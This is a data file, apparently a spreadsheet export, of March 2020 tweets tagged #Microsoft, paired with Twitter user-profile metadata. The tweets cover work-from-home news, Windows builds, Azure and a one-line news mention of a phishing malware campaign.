    <t>{'id': 132477980, 'id_str': '132477980', 'name': 'Massimiliano Lanzi', 'screen_name': 'massilanzi', 'location': 'Roma, Lazio', 'description': 'Crazy for my daughter, Science Fiction &amp; Fantasy Lover, Sports Fan, Young Biker, IT Enthusiast and Project Manager in a wide variety of ICT Security solutions', 'url': 'http://t.co/CGGnhusZg8', 'entities': {'url': {'urls': [{'url': 'http://t.co/CGGnhusZg8', 'expanded_url': 'http://it.linkedin.com/in/massimilianolanzi', 'display_url': 'it.linkedin.com/in/massimilianâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 333, 'friends_count': 1160, 'listed_count': 36, 'created_at': 'Tue Apr 13 10:22:37 +0000 2010', 'favourites_count': 9331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5957,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'http://pbs.twimg.com/profile_images/709122820693954560/WZlMgC8__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/709122820693954560/WZlMgC8__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/132477980/1568970883',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</si>
  <si>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08:12:54 +0000 2020</t>
  </si>
  <si>
    <t>Brad Smith, #Microsoft: As we work to protect public health, we also need to protect the income of hourly workers who support our campus - Microsoft on the Issues https://t.co/LjCdMMlJmm Smith:</t>
  </si>
  <si>
    <t>Fri Mar 06 08:12:27 +0000 2020</t>
  </si>
  <si>
    <t>#Bechtle #Microsoft #OneCompany #zukunftsstark #M365 #Office365
Please find the new Microsoft / Bechtle Branding page here:
https://t.co/kxjNtry0SS</t>
  </si>
  <si>
    <t>Fri Mar 06 08:08:26 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft: Amazon, Google, Facebook, and Microsoft are asking staff to work from home https://t.co/jIR6tx1LUg $MSFT #Microsoft #Technology #Tech #MSFT #digitaltransformation https://t.co/9VZcwwu1CG</t>
  </si>
  <si>
    <t>{'id': 4874962780, 'id_str': '4874962780', 'name': 'Sjoerd Bodbijl', 'screen_name': 'sjoerdapp', 'location': 'Rotterdam, The Netherlands', 'description': 'Explorer ðŸ‘¨ðŸ¼\u200dðŸš€ of the cutting edgeðŸ”ª, building the future in real-time. ðŸ¦„ðŸ¤  #Entrepreneur #MachineLearning #DeepLearning', 'url': 'https://t.co/gD9UxgTFBv', 'entities': {'url': {'urls': [{'url': 'https://t.co/gD9UxgTFBv', 'expanded_url': 'https://sjoerd.app', 'display_url': 'sjoerd.app', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1981, 'friends_count': 2320, 'listed_count': 56, 'created_at': 'Wed Feb 03 21:06:22 +0000 2016', 'favourites_count': 13693, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12643,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'http://pbs.twimg.com/profile_images/1075880059691565056/5_gCVBFP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075880059691565056/5_gCVBFP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4874962780/1553557722', 'profile_link_color': 'FF0260',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</si>
  <si>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Fri Mar 06 08:08:10 +0000 2020</t>
  </si>
  <si>
    <t>Cool new Microsoft badges! #microsoft #MEM #community https://t.co/eQeBWxjOVi</t>
  </si>
  <si>
    <t>{'id': 850254886910386177, 'id_str': '850254886910386177', 'name': 'Christiaan Evenhuis', 'screen_name': 'chris_evenhuis', 'location': '', 'description': 'Consultant @ InSpark. Big fan of the Modern Workplace. SCCM | Windows 10 | Enterprise Mobility + Security', 'url': 'https://t.co/GQzehXOd5X', 'entities': {'url': {'urls': [{'url': 'https://t.co/GQzehXOd5X', 'expanded_url': 'http://www.linkedin.com/in/christiaan-evenhuis-94b566b4', 'display_url': 'linkedin.com/in/christiaan-â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 178, 'listed_count': 3, 'created_at': 'Fri Apr 07 07:52:16 +0000 2017', 'favourites_count': 447, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 101, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/856833750914785280/L3jFKy09_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/856833750914785280/L3jFKy09_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/850254886910386177/1491552481',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</si>
  <si>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08:07:08 +0000 2020</t>
  </si>
  <si>
    <t>threatpost: A #phishing campaign leveraged #Microsoft OneNote to bypass detection tools and download the Agent Tesla malware onto victims systems.
https://t.co/MOWjkyb06m</t>
  </si>
  <si>
    <t>{'id': 369107103, 'id_str': '369107103', 'name': 'Mrs. Y.', 'screen_name': 'MrsYisWhy', 'location': 'In witness protection', 'description': 'Security Bene Gesserit and professional nerd stalker. Likes long walks in hubsites and searching for spice. Views: definitely those of my puppet sidekicks.', 'url': 'http://t.co/r71vPGKZF8', 'entities': {'url': {'urls': [{'url': 'http://t.co/r71vPGKZF8', 'expanded_url': 'http://postmodernsecurity.com', 'display_url': 'postmodernsecurity.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3065, 'friends_count': 1706, 'listed_count': 686, 'created_at': 'Tue Sep 06 19:45:13 +0000 2011', 'favourites_count': 804, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 199705, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '301E50', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1531808391/mata_hari_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1531808391/mata_hari_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/369107103/1453670983', 'profile_link_color': '462E60', 'profile_sidebar_border_color': 'CCC4ED', 'profile_sidebar_fill_color': '95649C', 'profile_text_color': '854C81', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:06:12 +0000 2020</t>
  </si>
  <si>
    <t>Basic feature thats a must for all virtual assistants on all smart devices. 
When you type to it, it should not reply with a voice.. instead show a text reply
Finally #Microsoft initiated it with #cortana in windows latest build.
#Siri #GoogleAssistant #Alexa</t>
  </si>
  <si>
    <t>{'id': 160494590, 'id_str': '160494590', 'name': 'Uday Krk', 'screen_name': 'udaykrk', 'location': 'India,AP', 'description': 'IBMer, Blogger, TechLover, Aspirant, Dreamer..', 'url': 'https://t.co/UD3xXwS9Mo', 'entities': {'url': {'urls': [{'url': 'https://t.co/UD3xXwS9Mo', 'expanded_url': 'http://www.techisher.com', 'display_url': 'techisher.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 265, 'listed_count': 4, 'created_at': 'Mon Jun 28 09:45:56 +0000 2010', 'favourites_count': 108, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 274,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'http://pbs.twimg.com/profile_images/957446321731874816/UYN9nhLO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/957446321731874816/UYN9nhLO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/160494590/1491571270', 'profile_link_color': '3B94D9',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'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:04:32 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1702253576, 'id_str': '1702253576', 'name': 'GANESH VASUDEVAN NAIR', 'screen_name': 'godsowntalk', 'location': 'India', 'description': 'GAMER,FRIENDSHIPS,EXPRESSIONS,TWEETER,INFLUENCER', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1106, 'friends_count': 1190, 'listed_count': 62, 'created_at': 'Mon Aug 26 15:43:01 +0000 2013', 'favourites_count': 113838, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 124838,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'http://pbs.twimg.com/profile_images/1234066498370625537/avsMc2oH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234066498370625537/avsMc2oH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1702253576/1583059553',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</si>
  <si>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08:04:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure Sentinel in Side-by-Side with Splunk https://t.co/Bc5LupQPHK #Azure #AzureSentinel #SIEM #Security #Splunk #SecOps #AzOps https://t.co/M3VGsfhlT3</t>
  </si>
  <si>
    <t>{'id': 89009369, 'id_str': '89009369', 'name': 'James van den Berg â˜', 'screen_name': 'JamesvandenBerg', 'location': 'Noord-Holland, Laren', 'description': "I'm a MVP CDM Cloud and DataCenter Management. #Azure #Azuremonitor #AzureStack #Sysctr #Hyperv #Winserv #AzureDevOps #WindowsInsiders #WIMVP   My blogsite :", 'url': 'http://t.co/PJ94D0L68t', 'entities': {'url': {'urls': [{'url': 'http://t.co/PJ94D0L68t', 'expanded_url': 'http://mountainss.wordpress.com/', 'display_url': 'mountainss.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6444, 'friends_count': 3173, 'listed_count': 705, 'created_at': 'Tue Nov 10 20:08:05 +0000 2009', 'favourites_count': 12618, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29136, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A4ECF5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/861166087219683330/cqSMd_jS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/861166087219683330/cqSMd_jS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89009369/1396048276', 'profile_link_color': '4F45E6', 'profile_sidebar_border_color': 'D9B17E', 'profile_sidebar_fill_color': 'F5F5C7', 'profile_text_color': '230D7A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:02:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Releases Windows 10 Build 19577 to Insiders #windows10 #microsoft #privacy #windowssecurity https://t.co/l8iSYgezx6 https://t.co/fZzJq3p9R6</t>
  </si>
  <si>
    <t>{'id': 1197057921407954944, 'id_str': '1197057921407954944', 'name': 'The Scottish Tech Guy', 'screen_name': 'tech_scottish', 'location': 'Scotland, United Kingdom', 'description': 'Professional IT Infrastructure Engineer and Tech Blogger I will also be using the #lifeofatechguy to document my journey!', 'url': 'https://t.co/mkzMS4IJbc', 'entities': {'url': {'urls': [{'url': 'https://t.co/mkzMS4IJbc', 'expanded_url': 'https://thescottishtechguy1.tech.blog/', 'display_url': 'thescottishtechguy1.tech.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 97, 'listed_count': 0, 'created_at': 'Wed Nov 20 07:43:53 +0000 2019', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 221, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1198564134008360962/IFJ9ConF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198564134008360962/IFJ9ConF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1197057921407954944/1574237689',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</si>
  <si>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08:01:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release #Windows10 Insider Preview Build 19577 to the #FastRing   https://t.co/06vio6MNOs by @mspoweruser</t>
  </si>
  <si>
    <t>{'id': 328919658, 'id_str': '328919658', 'name': 'Juriba', 'screen_name': 'Juriba', 'location': 'London', 'description': 'Helping enterprises manage IT transformation for Win 10, servers, email &amp; Office365. Follow for blog posts | eBooks | whitepapers | polls | insight | advice', 'url': 'http://t.co/IFJCtWuCxR', 'entities': {'url': {'urls': [{'url': 'http://t.co/IFJCtWuCxR', 'expanded_url': 'http://www.juriba.com', 'display_url': 'juriba.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 663, 'friends_count': 801, 'listed_count': 131, 'created_at': 'Mon Jul 04 08:00:12 +0000 2011', 'favourites_count': 290, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5383, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ABB8C2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/661570495133954048/7tBERJ5E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/661570495133954048/7tBERJ5E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/328919658/1446565049', 'profile_link_color': 'F6881F', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'FFFFFF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:01:02 +0000 2020</t>
  </si>
  <si>
    <t>What was hot at RSA Conference 2020? Check out our analysis, including vendor updates:
https://t.co/1mboIWtTUg
#Cisco #JuniperNetworks #Microsoft #VMWare #SentinelOne #TrendMicro #Fortinet #PaloAltoNetworks #LookOut #Mimecast https://t.co/leZFuI7nZw</t>
  </si>
  <si>
    <t>{'id': 22785567, 'id_str': '22785567', 'name': 'Canalys', 'screen_name': 'Canalys', 'location': 'Ch, In, NAm, SAm, UK', 'description': 'Canalys delivers smart market insights to mobility, enterprise and channel players around the world. We stake our reputation on the quality of our data.', 'url': 'http://t.co/Et5pAaJZgz', 'entities': {'url': {'urls': [{'url': 'http://t.co/Et5pAaJZgz', 'expanded_url': 'http://www.canalys.com/', 'display_url': 'canalys.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7364, 'friends_count': 1458, 'listed_count': 287, 'created_at': 'Wed Mar 04 15:19:00 +0000 2009', 'favourites_count': 854, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7424, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '006590', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/473324922958139392/eom0P6Tb_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/473324922958139392/eom0P6Tb_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22785567/1401684408', 'profile_link_color': '6C953C',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</si>
  <si>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Mar 06 08:00:37 +0000 2020</t>
  </si>
  <si>
    <t>I like it when you put your hands on my head... #California   #aws #microsoft https://t.co/zDQPeoPNms</t>
  </si>
  <si>
    <t>{'id': 1235691689773273093, 'id_str': '1235691689773273093', 'name': 'Sylvia Perez', 'screen_name': 'hcapefeechre', 'location': 'Little Rock, USA', 'description': 'If I had a flower for every time thought of youâ€¦ I could walk through my garden forever', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Thu Mar 05 22:20:37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'http://pbs.twimg.com/profile_images/1235704853558628352/cfXf17cL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235704853558628352/cfXf17cL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235691689773273093/1583450006',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</si>
  <si>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08:00:35 +0000 2020</t>
  </si>
  <si>
    <t>A script to test if Responsive Search Ads are helping or hurting your campaigns at query level  https://t.co/XFL8gf6OP4 #GoogleAds #Microsoft #ppc</t>
  </si>
  <si>
    <t>{'id': 455599834, 'id_str': '455599834', 'name': 'ADworld Experience', 'screen_name': 'adwexp', 'location': '', 'description': 'Online Advertising Success Stories (yearly event +600 participants &amp; video case studies) #adwexp', 'url': 'http://t.co/4CrFPvh0qs', 'entities': {'url': {'urls': [{'url': 'http://t.co/4CrFPvh0qs', 'expanded_url': 'http://www.adworldexperience.it', 'display_url': 'adworldexperience.it', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1669, 'friends_count': 99, 'listed_count': 171, 'created_at': 'Thu Jan 05 08:54:39 +0000 2012', 'favourites_count': 467, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3870,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'http://pbs.twimg.com/profile_images/542242567274770432/K5FDalWd_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/542242567274770432/K5FDalWd_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/455599834/1559729466', 'profile_link_color': '0084B4',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</si>
  <si>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Fri Mar 06 08:00:19 +0000 2020</t>
  </si>
  <si>
    <t>Top 9 #Microsoft Office Tips for iOS and Android https://t.co/GEtVhYN4i5 https://t.co/H7VH4AoO77</t>
  </si>
  <si>
    <t>{'id': 2839525138, 'id_str': '2839525138', 'name': 'UpSlide', 'screen_name': 'Up_Slide', 'location': 'London, New York, Paris', 'description': "World's Leading Add-In for #Excel, #PowerPoint and #Word. UpSlide saves you time, reduces costs, gives greater accuracy and increases #productivity.", 'url': 'http://t.co/I73E9Z5p73', 'entities': {'url': {'urls': [{'url': 'http://t.co/I73E9Z5p73', 'expanded_url': 'http://www.upslide.net', 'display_url': 'upslide.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4076, 'friends_count': 1933, 'listed_count': 102, 'created_at': 'Tue Oct 21 09:10:07 +0000 2014', 'favourites_count': 8615, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2572,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'http://pbs.twimg.com/profile_images/1141637792679813120/MRqvfIEQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141637792679813120/MRqvfIEQ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2839525138/1561368198',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</si>
  <si>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08:00:04 +0000 2020</t>
  </si>
  <si>
    <t>ClearSale builds foundation for growth and innovation with the #Azure #SQL Database #hyperscale service tier - #Microsoft #Brazil Flavio Pegas Rubens Monteiro https://t.co/xU5xi7ExJD #MSFTAdvocate</t>
  </si>
  <si>
    <t>"The success of the food revolution will depend on data." #Microsoft #AI https://t.co/p4qQo35DKG</t>
  </si>
  <si>
    <t>{'id': 108607685, 'id_str': '108607685', 'name': 'Klaus Eberhardt', 'screen_name': 'Klaus_Dynatrace', 'location': '', 'description': 'Senior Account Executive at Dynatrace', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 103, 'friends_count': 34, 'listed_count': 17, 'created_at': 'Tue Jan 26 13:42:44 +0000 2010', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2121,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'http://pbs.twimg.com/profile_images/969228064671649792/xITi6QLu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/969228064671649792/xITi6QLu_normal.jpg',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</si>
  <si>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07:59:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 365 gets updated frequently
Read more  https://t.co/0BiRvrnkvh
#Office365 #AI #Edge #Microsoft https://t.co/PhlC1l34vU</t>
  </si>
  <si>
    <t>{'id': 865486785798823936, 'id_str': '865486785798823936', 'name': "Tomorrow's VA", 'screen_name': 'TomorrowsVA', 'location': 'England, United Kingdom', 'description': 'The Microsoft Maestro - Enabling #VAs to learn how to master Microsoft Office to help them grow, be more productive, and help their clients more effectively.', 'url': 'https://t.co/ZBOfHF9XW6', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZBOfHF9XW6', 'expanded_url': 'http://www.tomorrowsva.com', 'display_url': 'tomorrowsva.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 895, 'friends_count': 1378, 'listed_count': 19, 'created_at': 'Fri May 19 08:38:24 +0000 2017', 'favourites_count': 4132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5130,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'http://pbs.twimg.com/profile_images/882218185558282240/k-0YhBPB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/882218185558282240/k-0YhBPB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/865486785798823936/1499172290', 'profile_link_color': 'ED743A',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</si>
  <si>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07:59:07 +0000 2020</t>
  </si>
  <si>
    <t>Ten points for @Microsoft for these bold #sustainability targets; love your ambition! 
#microsoft #carbonemissions  https://t.co/VDDUrkO52R</t>
  </si>
  <si>
    <t>{'id': 1165342043322892289, 'id_str': '1165342043322892289', 'name': 'Riika Wikberg', 'screen_name': 'RiikaWikberg', 'location': 'Helsinki, Suomi', 'description': 'Head of #BusinessDevelopment and Member of the Management Board at @MarimekkoGlobal. Tweeting about #Marimekko, #brands, #retail, #design and #sustainability', 'url': 'https://t.co/7aLvdijm8V', 'entities': {'url': {'urls': [{'url': 'https://t.co/7aLvdijm8V', 'expanded_url': 'http://www.linkedin.com/in/RiikaWikberg', 'display_url': 'linkedin.com/in/RiikaWikberg', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 70, 'friends_count': 118, 'listed_count': 1, 'created_at': 'Sat Aug 24 19:16:35 +0000 2019', 'favourites_count': 239, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 132, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1166377316139905025/oaqG8aR5_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166377316139905025/oaqG8aR5_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1165342043322892289/1566921695',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</si>
  <si>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07:58:37 +0000 2020</t>
  </si>
  <si>
    <t>[Archive] Connecting to Exchange Online with PowerShell https://t.co/vQ0BL2uuGe #cloud #exchangeonline #microsoft #office</t>
  </si>
  <si>
    <t>{'id': 987991856993787904, 'id_str': '987991856993787904', 'name': 'vcloudnine.de', 'screen_name': 'vcloudnine_de', 'location': 'Cologne, Germany', 'description': 'Tweeting about virtualization, networking, storage &amp; backup, cloud and IT infrastructure in general.', 'url': 'https://t.co/RI7KPL6Mba', 'entities': {'url': {'urls': [{'url': 'https://t.co/RI7KPL6Mba', 'expanded_url': 'https://www.vcloudnine.de', 'display_url': 'vcloudnine.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 87, 'listed_count': 1, 'created_at': 'Sun Apr 22 09:49:49 +0000 2018', 'favourites_count': 469, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2654,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'http://pbs.twimg.com/profile_images/988003443339153409/D6vlVj6v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/988003443339153409/D6vlVj6v_normal.jpg',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</si>
  <si>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07:57:03 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
@Ami032108 
@khemka_nidhi 
@GargeeGanguly</t>
  </si>
  <si>
    <t>{'id': 917297369263362049, 'id_str': '917297369263362049', 'name': 'Pari0275', 'screen_name': 'pari0275', 'location': 'Dahisar East, Mumbai', 'description': 'Never give upðŸ‘', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1437, 'friends_count': 3565, 'listed_count': 9, 'created_at': 'Mon Oct 09 07:55:10 +0000 2017', 'favourites_count': 59653, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45902, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214420861907656704/8OBd8fEz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214420861907656704/8OBd8fEz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/917297369263362049/1533612752',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</si>
  <si>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07:54:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers #5G Network Edge Compute Technology
 #ATT #Microsoft #NEC #Azure #Microsoft
https://t.co/miQcIABp5X</t>
  </si>
  <si>
    <t>{'id': 3238803576, 'id_str': '3238803576', 'name': 'Build5Nines', 'screen_name': 'Build5Nines', 'location': 'Cloud', 'description': 'All about the Microsoft Cloud! from Chris Pietschmann (@crpietschmann) and friends! This account is not affiliated with Microsoft.', 'url': 'https://t.co/myOrPpSqVG', 'entities': {'url': {'urls': [{'url': 'https://t.co/myOrPpSqVG', 'expanded_url': 'https://Build5Nines.com', 'display_url': 'Build5Nines.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6685, 'friends_count': 708, 'listed_count': 382, 'created_at': 'Sun Jun 07 12:57:08 +0000 2015', 'favourites_count': 18760, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21422,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'http://pbs.twimg.com/profile_images/880921729715105792/lA_IHa1s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/880921729715105792/lA_IHa1s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3238803576/1571778104',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</si>
  <si>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07:50:10 +0000 2020</t>
  </si>
  <si>
    <t>#Google &amp;amp; #Microsoft have granted free access for a limited time to their robust teleconferencing and collaboration tools #HangoutsMeet and #Teams for their enterprise customers due to #CoronaVirusChallenge to make it easier for people to work from home. https://t.co/Cumfzsm7cd</t>
  </si>
  <si>
    <t>{'id': 2215700054, 'id_str': '2215700054', 'name': 'Viqar Ahmed Madni', 'screen_name': 'VAMadni', 'location': 'Karachi, Pakistan', 'description': 'Disruption is Inevitable, therefore, I am passionate for: #DigitalTransformation #BusinessModelInnovation and #CloudComputing', 'url': 'https://t.co/yvqfhi1VRW', 'entities': {'url': {'urls': [{'url': 'https://t.co/yvqfhi1VRW', 'expanded_url': 'http://www.digiglobal.pk', 'display_url': 'digiglobal.pk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 335, 'friends_count': 163, 'listed_count': 8, 'created_at': 'Tue Nov 26 13:11:35 +0000 2013', 'favourites_count': 179, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1808,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'http://pbs.twimg.com/profile_images/862317408345882625/610B43mh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862317408345882625/610B43mh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2215700054/1509488119',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</si>
  <si>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07:49:47 +0000 2020</t>
  </si>
  <si>
    <t>Get this #personal #finance #document #template to #calculate incoming and outgoings from https://t.co/gEqSszJXAv
#microsoft #docs #design #startups #picture #register #free #Easy #simple #excel #powerpoint #spreadsheet #online #passion #office #UK #new #value #business #sales https://t.co/iEVLuGZf0j</t>
  </si>
  <si>
    <t>Fri Mar 06 07:49:17 +0000 2020</t>
  </si>
  <si>
    <t>Effects of #coronovirus
#Adobe canceled annual summit in Vegas
#Amazon &amp;amp; #Twitter encouraging employees to WFH
#Apple restricted employee travel to China, Italy, South Korea
#Facebook canceled F8 developers conference 
#Google canceled I/O
#Microsoft canceled  MVP Summit</t>
  </si>
  <si>
